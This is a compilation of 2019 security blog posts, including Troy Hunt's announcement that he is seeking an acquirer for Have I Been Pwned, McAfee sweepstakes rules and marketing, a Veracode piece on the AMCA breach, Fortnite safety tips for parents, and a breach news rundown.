I’ll save the history lesson for the years between then and today because there are presently 106 blog posts with the HIBP tag you can go and read if you’re interested, let me just talk briefly about where the service is at today. It has almost 8B breached records, there are nearly 3M people subscribed to notifications, I’ve emailed those folks about a breach 7M times, there are 120k people monitoring domains they’ve done 230k searches for and I’ve emailed them another 1.1M times. There are 150k unique visitors to the site on a normal day, 10M on an abnormal day, another couple of million API hits to the breach API and then 10M a day to Pwned Passwords. Except even that number is getting smashed these days:

Oh – and as I’ve written before, commercial subscribers that depend on HIBP to do everything from alert members of identity theft programs to enable infosec companies to provide services to their customers to protecting large online assets from credential stuffing attacks to preventing fraudulent financial transactions and on and on. And there are the governments around the world using it to protect their departments, the law enforcement agencies leveraging it for their investigations and all sorts of other use cases I never, ever saw coming (my legitimisation of HIBP post from last year has a heap of other examples). And to date, every line of code, every configuration and every breached record has been handled by me alone. There is no “HIBP team”, there’s one guy keeping the whole thing afloat.

When I wanted an infographic to explain the architecture, I sat there and built the whole thing myself by hand. I manually sourced every single logo of a pwned company, cropping it, resizing it and optimising it. Each and every disclosure to an organisation that didn't even know their data was out there fell to me (and trust me, that's massively time-consuming and has proven to be the single biggest bottleneck to loading new data). Every media interview, every support request and frankly, pretty much every single thing you could possibly conceive of was done by just one person in their spare time. This isn't just a workload issue either; I was becoming increasingly conscious of the fact that I was the single point of failure. And that needs to change.

It's Time to Grow Up

That was a long intro but I wanted to set the scene before I got to the point of this blog post: it’s time for HIBP to grow up. It’s time to go from that one guy doing what he can in his available time to a better-resourced and better-funded structure that's able to do way more than what I ever could on my own. To better understand why I’m writing this now, let me share an image from Google Analytics:

That graph is the 12 months to Jan 18 this year and the spike corresponds with the loading of the Collection #1 credential stuffing list. It also corresponds with the day I headed off to Europe for a couple of weeks of “business as usual” conferences, preceded by several days of hanging out with my 9-year-old son and good friends in a log cabin in the Norwegian snow. I was being simultaneously bombarded by an unprecedented level of emails, tweets, phone calls and every other imaginable channel due to the huge attention HIBP was getting around the world, and also turning things off, sitting by a little fireplace in the snow and enjoying good drinks and good conversation. At that moment, I realised I was getting very close to burn-out. I was pretty confident I wasn’t actually burned out yet, but I also became aware I could see that point in the not-too-distant future if I didn’t make some important changes in my life. (I’d love to talk more about that in the future as there are some pretty significant lessons in there, but for now, I just want to set the context as to the timing and talk about what happens next.) All of this was going on at the same time as me travelling the world, speaking at events, running workshops and doing a gazillion other things just to keep life ticking along.

To be completely honest, it's been an enormously stressful year dealing with it all. The extra attention HIBP started getting in Jan never returned to 2018 levels, it just kept growing and growing. I made various changes to adjust to the workload, perhaps one of the most publicly obvious being a massive decline in engagement over social media, especially Twitter:

Up until (and including) December last year in that graph, I was tweeting an average of 1,141 times per month (for some reason, Twitter's export feature didn't include May and June 2017 and only half of July so I've dropped those months from the graph). From Feb to May this year, that number has dropped to 315 so I've backed off social to the tune of 72% since January. That may seem like a frivolous fact to focus on, but it's a quantifiable number that's directly attributable to the impact the growth of HIBP was having on my life. Same again if you look at my blog post cadence; I've religiously maintained my weekly update videos but have had to cut way back on all the other technical posts I've otherwise so loved writing over the last decade.

After I got home from that trip, I started having some casual conversations with a couple of organisations I thought might be interested in acquiring HIBP. These were chats with people I already knew in places I respected so it was a low-friction “put out the feelers” sort of situation. It’s not the first time I’d had discussions like this – I’d done this several times before in response to organisations reaching out and asking what my appetite for acquisition was like – but it was the first time since the overhead of managing the service had gone off the charts. There was genuine enthusiasm which is great, but I quickly realised that when it comes to discussions of this nature, I was in well over my head. Sure, I can handle billions of breached records and single-handedly run a massive online data breach service that’s been used by hundreds of millions of people, but this was a whole different ballgame. It was time to get help.

Project Svalbard

Back in April during a regular catchup with the folks at KPMG about some otherwise mundane financial stuff (I've met with advisers regularly as my own financial state became more complex), they suggested I have a chat with their Mergers and Acquisitions (M&A) practice about finding a new home for HIBP. I was comfy doing that; we have a long relationship and they understand not just HIBP, but the broader spectrum of the cyber things I do day to day. It wasn't a hard decision to make - I needed help and they had the right experience and the right expertise.

In meeting with the M&A folks, it quickly became apparent how much support I really needed. The most significant thing that comes to mind is that I'd never really taken the time just to step back and look at what HIBP actually does. That might sound odd, but as it's grown organically over the years and I've built it out in response to a combination of what I think it should do and where the demand is, I've not taken the time to step back and look at the whole thing holistically. Nor have I taken enough time to look at what it could do; I'm going to talk more about that later in this post, but there's so much potential to do so much more and I really needed the support of people that specialise in finding the value in a business to help me see that.

One of the first tasks was to come up with a project name for the acquisition because apparently, that's what you do with these things. There were many horribly kitschy options and many others that leaned on overused infosec buzzwords, and then I had a thought: what's that massive repository of seeds up in the Arctic Circle? I'd seen references to it before and the idea of a huge vault stockpiling something valuable for the betterment of humanity started to really resonate. Turns out the place is called Svalbard and it looks like this:

Also turns out the place is part of Norway and all these things combined started to make it sound like a befitting name, beginning with the obvious analogy of storing a massive quantity of "units". There's a neat video from a few years ago which talks about the capacity being about a billion seeds; not quite as many records as are in HIBP, but you get the idea. Then there's the name: it's a bit weird and hard to pronounce for those not familiar with it (although this video helps), kinda like... pwned. And finally, Norway has a lot of significance for me being the first international talk I did almost 5 years ago to the day. I spoke in front of an overflowing room and as the audience exited, every single one of them dropped a green rating card into the box.

That was an absolute turning point in my career. It was also in Norway this January that HIBP went nuts as you saw in the earlier graph. It was there in that little log cabin in the snow that I realised it was time for HIBP to grow up. And by pure coincidence, I'm posting this today from Norway, back again for my 6th year in a row of NDC Oslo. So as you can see, Svalbard feels like a fitting name 🙂

My Commitments for the Future of HIBP

So what does it mean if HIBP is acquired by another company? In all honesty, I don't know precisely what that will look like so let me just candidly share my thoughts on it as they stand today and there are a few really important points I want to emphasise:

  1. Freely available consumer searches should remain freely available. The service became this successful because I made sure there were no barriers in the way for people searching their data and I absolutely, positively want that to remain the status quo. That's number 1 on the list here for a reason.
  2. I'll remain a part of HIBP. I fully intend to be part of the acquisition, that is some company gets me along with the project. HIBP's brand is intrinsically tied to mine and at present, it needs me to go along with it.
  3. I want to build out much, much more capabilities-wise. There's a heap of things I want to do with HIBP which I simply couldn't do on my own. This is a project with enormous potential beyond what it's already achieved and I want to be the guy driving that forward.
  4. I want to reach a much larger audience than I do at present. The numbers are massive as they are, but it's still only a tiny slice of the online community that's learning of their exposure in data breaches.
  5. There's much more that can be done to change consumer behaviour. Credential stuffing, for example, is a massive problem right now and it only exists due to password reuse. I want HIBP to play a much bigger role in changing the behaviour of how people manage their online accounts.
  6. Organisations can benefit much more from HIBP. Following on from the previous point, the services people are using can do a much better job of protecting their customers from this form of attack and data from HIBP can (and for some organisations, already does) play a significant role in that.
  7. There should be more disclosure - and more data. I mentioned earlier how responsible disclosure was massively burdensome and Svalbard gives me the chance to fix that. There's a whole heap of organisations out there that don't know they've been breached simply because I haven't had the bandwidth to deal with it all.

In considering which organisations are best positioned to help me achieve this, there's a solid selection that are at the front of my mind. There's also a bunch that I have enormous respect for but are less well-equipped to help me achieve this. As the process plays out, I'll be working with KPMG to more clearly identify which organisations fit into the first category. As I'm sure you can imagine, there are some very serious discussions to be had: where HIBP would fit into the organisation, how they'd help me achieve those bullet-pointed objectives above and frankly, whether it's the right place for such a valuable service to go. There are also some major personal considerations for me including who I'd feel comfortable working with, the impact on travel and family and, of course, the financial side of the whole thing. I'll be honest - it's equal parts daunting and exciting.

Last week I began contacting each stakeholder that would have an interest in the outcome of Project Svalbard before making it public in this blog post. I explained the drivers behind it and the intention for this exercise to make HIBP not just more sustainable, but also for it to make a much bigger impact on the data breach landscape. This has already led to some really productive discussions with organisations that could help HIBP make a much more positive impact on the industry. There's been a lot of enthusiasm and support for this process which is reassuring.

One question I expect I'll get is "why don't I turn it into a more formal, commercially-centric structure and just hire people?" I've certainly had that opportunity for some time either by funding it myself or via the various VCs that have come knocking over the years. The main reason I decided not to go down that path is that it massively increases my responsibilities at a time where I really need to reduce the burden on me. As of today, I can't just switch off for a week and frankly, if I tried even for a day I'd be worried about missing something important. In time, building up a company myself might allow me to do that but only after investing a substantial amount of time (and money) which is just not something I want to do at this point.

Summary

I'm enormously excited about the potential of Project Svalbard. In those early discussions with other organisations, I'm already starting to see a pattern emerge around better managing the entire data breach ecosystem. Imagine a future where I'm able to source and process much more data, proactively reach out to impacted organisations, guide them through the process of handling the incident, ensure impacted individuals like you and me better understand our exposure (and what to do about it) and ultimately, reduce the impact of data breaches on organisations and consumers alike. And it goes much further than that too because there's a lot more that can be done post-breach, especially to tackle attacks such as the huge rate of credential stuffing we're seeing these days. I'm really happy with what HIBP has been able to do to date, but I've only scratched the surface of potential with it so far.

I've made this decision at a time where I have complete control of the process. I'm not under any duress (not beyond the high workload, that is) and I've got time to let the acquisition search play out organically and allow it to find the best possible match for the project. And as I've always done with HIBP, I'm proceeding with complete transparency by detailing that process here. I'm really conscious of the trust that people have put in me with this service and every single day I'm reminded of the responsibility that brings with it.

HIBP may only be less than 6 years old, but it’s the culmination of a life’s work. I still have these vivid memories stretching back to the mid-90's when I first started building software for the web and had a dream of creating something big; “Isn’t it amazing that I can sit here at home and write code that could have a real impact on the world one day”. I had a few false starts along the way and it took a combination of data breaches, cloud and an independent career that allowed me the opportunity to make HIBP what it is today, but it's finally what I'd always hoped I'd be able to do. Project Svalbard is the realisation of that dream and I'm enormously excited about the opportunities that will come as a result.

Have Fun in the Sun this Summer with the Summer Safety #RT2Win Sweepstakes!

The school year has come to an end, and with it comes the start of summer! For many, this time of year brings excitement and anticipation to jet-set off to their favorite destinations and spend some quality time with family. But while many are soaking up the sun or sharing fun photos online, cybercriminals are also trying to target those not taking the proper precautions to protect their data.

In fact, according to recent research by McAfee, only 40% of people are concerned about their personal photos being hacked, and people are 3x more concerned about their Social Security number being hacked than their photos. Whether booking travel deals or sharing photos on social media, device security should be top of mind to keep information secure this summer.

Whether you’re lying by the pool or dipping your toes in the sand, we want to help you leave your cybersecurity woes behind with our Summer Safety #RT2Win sweepstakes! Two [2] lucky winners of the sweepstakes drawing will receive a $500 Amazon gift card. The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, June 10, 2019, at 12:00pm PST. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included in order to be entered.
  • Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
  • Sweepstakes will end on Sunday, June 23, 2019 at 11:59pm PST. All entries must be made before that date and time.
  • Winners will be notified on Tuesday, June 25, 2019 via Twitter direct message.
  • Limit one entry per person.

1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two [2] total winners will be selected and announced on June 25, 2019. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Summer Safety #RT2Win Sweepstakes will be conducted from June 10, 2019 through June 23, 2019. All entries for each day of the McAfee Summer Safety Cybersecurity #RT2Win Sweepstakes must be received during the time allotted for the McAfee Summer Safety #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Summer Safety Shopping #RT2Win Sweepstakes; the duration is as follows:

  • Begins: Monday, June 10, 2019 at 12:00pm PST
  • Ends: Sunday, June 23, 2019 at 11:59pm PST
  • Two [2] winners will be announced: Tuesday, June 25, 2019

For the McAfee Summer Safety #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Summer Safety #RT2Win Sweepstakes:

  1. Follow @McAfee_Home on Twitter.
  2. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes.
  3. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags.
  4. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  5. Limit one entry per person.

Two [2] winners will be chosen for the McAfee Summer Safety #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Tuesday, June 25, 2019 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.

3. Eligibility: 

McAfee Summer Safety #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the date the McAfee Summer Safety #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and the McAfee Summer Safety #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Summer Safety #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Summer Safety #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com by June 25, 2019. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or the prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if a potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if a potential winner fails to return the requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prize for the McAfee Summer Safety #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two [2] entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Summer Safety #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Summer Safety #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee Summer Safety #RT2Win Sweepstakes has no affiliation with Amazon.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Summer Safety #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Summer Safety #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Summer Safety #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Summer Safety #RT2Win Sweepstakes-related activity, or participation in the McAfee Summer Safety #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  1. To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  2. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

9. Prize Forfeiture:

If a winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the McAfee Summer Safety #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from the remaining eligible entries for each McAfee Summer Safety #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Summer Safety #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Summer Safety #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with this sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.

12. Privacy Policy: 

Personal information obtained in connection with this McAfee Summer Safety #RT2Win Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after June 10, 2019 and before June 23, 2019 to the address listed below, Attn: #RT2Win at Summer Safety Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2019 by McAfee, LLC. All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS Pulse, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Have Fun in the Sun this Summer with the Summer Safety #RT2Win Sweepstakes! appeared first on McAfee Blogs.

What the AMCA Data Breach Teaches Us About Modern Supply Chain Security

The State of Software Security Volume 9 (SOSS Vol. 9) found that the healthcare industry, with its stringent regulations, received relatively high marks in many of the standard AppSec metrics. According to Veracode scan data, healthcare organizations ranked highest of all industries on OWASP pass rate on latest scan, coming in with a rate just over 55 percent. Our flaw persistence analysis shows that the industry is statistically closing found vulnerabilities far faster than any other sector.

However, the recent American Medical Collection Agency data breach has brought attention to the fact that breaches involving subcontractors and business associates, particularly in the healthcare industry, are on the rise. As both Quest Diagnostics and Laboratory Corporation of America Holdings (LabCorp) have filed 8-Ks with the Securities and Exchange Commission (SEC), as many as 11.9 million people may have had their personal and payment information stolen by an unauthorized user.

Earlier this year, Moody’s Investor Service ranked hospitals as one of the sectors most vulnerable to cyberattacks. In a press release, Moody's Managing Director Derek Vadala said, “We view cyber risk as event risk that can have material impact on sectors and individual issuers. Data disclosure and business disruption are the two primary types of cyber event risk that we view as having the potential for material impact on issuers' financial profiles and business prospects.”

Ensuring the security of patient data

Healthcare organizations appear to be doing their part to ensure the safety of their patient and customer data. Recently, the Wall Street Journal’s Melanie Evans and Peter Loftus published a story about how hospitals are asking device makers to let them under the hood of their software to look for flaws and vulnerabilities – and opting out of doing business if they’re not granted access. The article cites how, in 2017, NewYork-Presbyterian dropped plans to buy infusion pumps manufactured by Smiths Group PLC after the Department of Homeland Security issued a warning that hackers could take control of pumps (a fix has since been released).

That same year, many hospitals were forced to cancel appointments and surgeries when their operations were stunted by WannaCry and NotPetya cyberattacks – so it’s no wonder hospitals began enlisting the help of cybersecurity pros, including penetration testers.

Evans and Loftus spoke with corporate counsel at Boston Scientific who noted that negotiations with hospitals are more complicated and drawn out than ever before as a result of cybersecurity demands.

Where is the gap in the modern healthcare supply chain?

Given the sensitivity of the data involved, it’s reasonable for hospitals and healthcare IT companies to be more inquisitive. But it’s not just the healthcare-related technologies that they need to look into.

SOSS Vol. 9 shows that the financial industry, while boasting the largest population of applications under test and with a reputation of maintaining some of the most mature AppSec programs, is struggling to meet AppSec standards. The industry ranks second to last in major verticals examined for OWASP pass rate on latest scan, and based on flaw persistence analysis, it’s leaving flaws to linger longer than other industries do.

In order for hospitals and healthcare organizations to ensure the security of those they care for, they need to be able to trust that the third-party vendors and service providers that they enlist to take payments and process claims are taking the appropriate precautions when it comes to software security.

Awareness begets progress

In 2017, Veracode conducted research with YouGov to better understand how well business leaders understood the cybersecurity risks they are introducing to their company as a result of digital transformation and participation in the global economy. What we found was that awareness was low – even following the Equifax breach that occurred that year. The research showed that only 28 percent of respondents had heard of the attack.

Since then, we’ve seen a number of CEOs and other executives paying the price after a breach. Veracode CTO, EMEA, Paul Farrington, said it best:

“Ultimately, this is merely an extension of expectations on the C-Suite when responding to serious events. If CEOs violate environmental, health, or safety standards, they can be fined, and even jailed in many countries. Perfect security is not possible, but with data about our entire lives now being stored and processed by businesses, it is essential that employees and customers alike are afforded a certain standard of cybersecurity. When such standards aren’t met, there ought to be accountability at a senior level.”

As healthcare organizations and hospitals are doing an increased level of due diligence before making a purchase or partnering with third parties, we can expect that other industries are likely to follow suit. Executives will begin to add security to their list of priorities, because it will be demanded by the board in an effort to protect their brand and bottom line.

Give your customers confidence that your software is secure

Given that perfect security isn’t possible, organizations should consider reviewing their software development processes to ensure that security is embedded in each stage. One of the reasons that we created Veracode Verified, which helps your organization prove at a glance that you’ve made security a priority, is to help organizations stay ahead of customer and prospect security concerns and speed up sales cycles – without straining limited security resources. The program provides you with a proven roadmap for maturing your application security program, as well as an attestation letter you can share with customers and prospects.

Curious to learn more about how your organization may benefit from Veracode Verified? Have a look at this infographic to get the details.

Don’t Hesitate When Transforming Your Business

Transformation is a popular buzz word in the tech industry. The market is full of companies promising to be the change your business needs to help it transform into the best player in its category. Many companies that have been around for a decade or more believe they’ve already transformed their business numerous times to keep up with the latest technology trends, while newer companies tend to practice business transformation daily to stay competitive. But is business transformation really needed? The answer is yes! However, transformation is an evolutionary process and won’t happen overnight. Organizations need to think about the future and embrace the fact they need to constantly change and move forward.

Transformation is Continuous

A disruptive and groundbreaking company will continually transform alongside its customers, adopting new applications and policies around the cloud, BYOD and more. As these items evolve, companies are confronted with the challenges and risks of change, including securing new endpoints on devices or in the cloud.

As companies evolve and transform to keep up with the latest IT trends, overlooking the security of company data is a common misstep. A recent study by leading IT analyst firm Frost & Sullivan revealed that 83% of APAC organizations don’t think about cybersecurity while embarking on digital transformation projects. Although 72% of the organizations conduct regular breach assessment to protect themselves against cyberattacks, 55% of them were at risk.

A Plan of Action

Companies are predicted to spend $1.7 trillion on digital transformation by the end of 2019, a 42% increase from 2017, according to IDC. With IT budgets at nearly their highest point, it’s time to rethink your transformation strategy and make security a priority.

The cloud is transforming the enterprise, and as a market leader, McAfee is transforming the way businesses secure data in the cloud. We transform the nature of security itself with SaaS (security-as-a-service) consumption models. By partnering with us, organizations can transform confidently, leveraging security solutions purpose-built with transformation in mind, including those that secure every segment of the cloud and heterogeneous device environments. McAfee cloud security solutions extend your security from device to cloud with data visibility, data loss prevention, and advanced threat protection on a platform that supports an open ecosystem. Our goal is to make the most secure environment for your business from device to cloud.

As you start your transformation journey, consider the following questions:

  • How is your organization aligned? What are your organization’s goals?
  • What are the biggest/most important strategic initiatives your company has over the next two to four years?
  • What are your current major IT initiatives? Security initiatives? Cloud initiatives?

Looking to transform your business with McAfee? We’re here to help. Use the resources below for more information.

The post Don’t Hesitate When Transforming Your Business appeared first on McAfee Blogs.

Podcast Two Year Anniversary – The Top 10 Episodes

Two years ago on June 9th, 2017 I released the first episode of Security In Five. Here we are two years later, 500+ episodes recorded and no signs of slowing down. The podcast’s longevity and the energy to keep up the daily episode schedule is all because of the listeners and feedback I have received. […]

The post Podcast Two Year Anniversary – The Top 10 Episodes appeared first on Security In Five.

Study: Fortnite Game Becoming the Preferred Social Network for Kids

According to a study recently released by National Research Group (NRG), the wildly popular video game Fortnite is growing beyond its intended gaming platform into a favored social network where kids go daily to chat, message, and connect.

The study represents the most in-depth study on Fortnite to date and contains essential takeaways for parents trying to keep up with their kids’ social networking habits. According to the NRG study, “Fortnite is the number one service teens are using, and audiences cite its social elements as the primary motivators for playing.”

The popular game now claims more than 250 million users around the world, and for its audience of teens (ages 10-17) who play at least once a week, Fortnite consumes about 25% of their free time, cites NRG adding that “Fortnite presents a more hopeful meta-verse where community, inclusivity, creativity and authentic relationships can thrive.”

Summer gaming 

With school break now upon us, the NRG study is especially useful since screentime tends to jump during summer months. Here are some of the risks Fortnite (and gaming in general) presents and some tips on how to increase privacy and safety for young users who love this community.

Fortnite safety tips 

Activate parental controls. Kids play Fortnite on Xbox One, PlayStation 4, Nintendo Switch, and iOS. Parents can restrict and monitor playing time by going into the Settings tab of each device, its related URL, or app. Another monitoring option for PC, tablets, and mobile devices is monitoring software.

Listen, watch, learn. Sit with your kids and listen to and watch some Fortnite sessions. Who are they playing with? What’s the tone of the conversation? Be vocal about anything that concerns you and coach your child on how to handle conflict, strangers online (look at their friend list), and bullying.

Monitor voice chat. Voice chat is an integral part of Fortnite if you are playing in squads or teams. Without the chat function, players can’t communicate in real-time with other team members. Voice chat is also a significant social element of the game because it allows players to connect and build community with friends anywhere. Therein lies the risk — voice chat also allows kids to play the game with strangers, so inappropriate conversation, cyberbullying, and grooming are all reported realities of Fortnite. Voice chat can be turned off in Settings, and doing so should be considered for younger tween users.

Scams, passwords, and tech addiction. When kids are having a blast playing video games, danger is far from their minds. Talk about the downside so they can continue to play their favorite game in a safe, healthy way. Discuss the scams targeting Fortnite users, the importance of keeping user names and passwords private (and strong), and the reasoning behind gaming screen limits.

Social networks have become inherent to kids’ daily life and an important way to form meaningful peer bonds. With new networks emerging every day such as Fortnite, it’s more important than ever to keep the conversation going with your kids about the genuine risks these fun digital hangouts bring.

The post Study: Fortnite Game Becoming the Preferred Social Network for Kids appeared first on McAfee Blogs.

Weekly Update 142

I made it to the Infosecurity hall of fame! Yesterday was an absolutely unreal experience that was enormously exciting:

But that wasn't all, there was also the European Security Blogger awards a couple of days earlier:

And just a general absolutely jam-packed, non-stop week for both Scott and me. We talk about what we've been up to in London, Scott's weird cert adventures and a couple of massive data breaches back home in Australia. I'm publishing this just before I head off to Oslo so I'll come from there next week solo, then with Scott again the week after from the NDC conference. Until then, here's this week's update:

References

  1. Scott had a cert unexpectedly issued for one of his domains (interesting series of events that led to it, documented in that Twitter thread)
  2. Scott tweeted about a weird security decision by Emirate... and got into "Twitter trouble" (we only ever - ever - see this sort of behaviour online, never in person)
  3. Westpac's PayID was the target of a mass enumeration attack (apparently 100k Aussies had personal data exposed by this "feature")
  4. The Australian National University got seriously pwned (19 years worth of historical data - how much of that did they actually still need?)
  5. I'm sponsored by Varonis this week - watch their DFIR team investigate a cyberattack using their data-centric security stack

Cyber News Rundown: Medical Testing Service Data Breach

Quest Diagnostics Customers Affected by Third-Party Breach

The medical testing organization Quest Diagnostics has fallen victim to a third-party data breach that could affect nearly 12 million of their patients. AMCA, a collections agency that works with Quest Diagnostics, noticed unauthorized access to their systems over an eight-month period from August of last year through March 2019. The majority of data targeted were Social Security Numbers and other financial documents, rather than patients’ health records. The market offers a premium for such data.

Adware Installed by Millions of Android Users

Until recently, there were over 230 apps on the Google Play store that had been compromised by a malicious plugin that forced out-of-app advertisements on unsuspecting victims. Globally, over 440 million individuals have installed at least one of these compromised applications and have been affected by overly-aggressive advertisements. While this SDK has been used legitimately for nearly a year, sometime during 2018 the plugin began performing increasingly malicious behaviors, until other developers caught on and began updating their own applications to remove the plugin. 

Chinese Database Exposes Millions of Records

A database belonging to FMC Consulting, a headhunting firm based in China, was recently found by researchers to be publicly available. Among the records are resumes and personally identifiable information for millions of individuals, as well as company data with thousands of recorded messages and emails. Unfortunately for anyone whose information is contained within this database, in the two weeks since being notified of the breach FMC has yet to acknowledge it or take steps to secure the database.

Restaurant Payment Systems Infected

Customers who’ve patronized either Checkers or Rally’s restaurants in recent months are being urged to monitor their credit cards after the chain announced that they discovered card-stealing malware on their internal systems. While not all restaurant locations were affected, the company is still working to determine the extent of the compromised payment card systems and has offered credit monitoring services to customers.

University of Chicago Medicine Server Found Online

Researchers have found a server belonging to University of Chicago Medicine with personal information belonging to more than 1.6 million current and past donors. The data includes names, addresses, and even marital and financial information for each donor. Fortunately, the researcher was quick to inform the university of the unsecured ElasticSearch server and it was taken down within 48 hours.

The post Cyber News Rundown: Medical Testing Service Data Breach appeared first on Webroot Blog.

UK Security BSides, Mark Your Calendar & Don’t Miss Out

BSides conferences are fantastic events for budding cyber and information security novices through to seasoned security professionals to learn, discuss the latest security challenges, network with peers and to make new contacts from across the UK cyber security scene. 
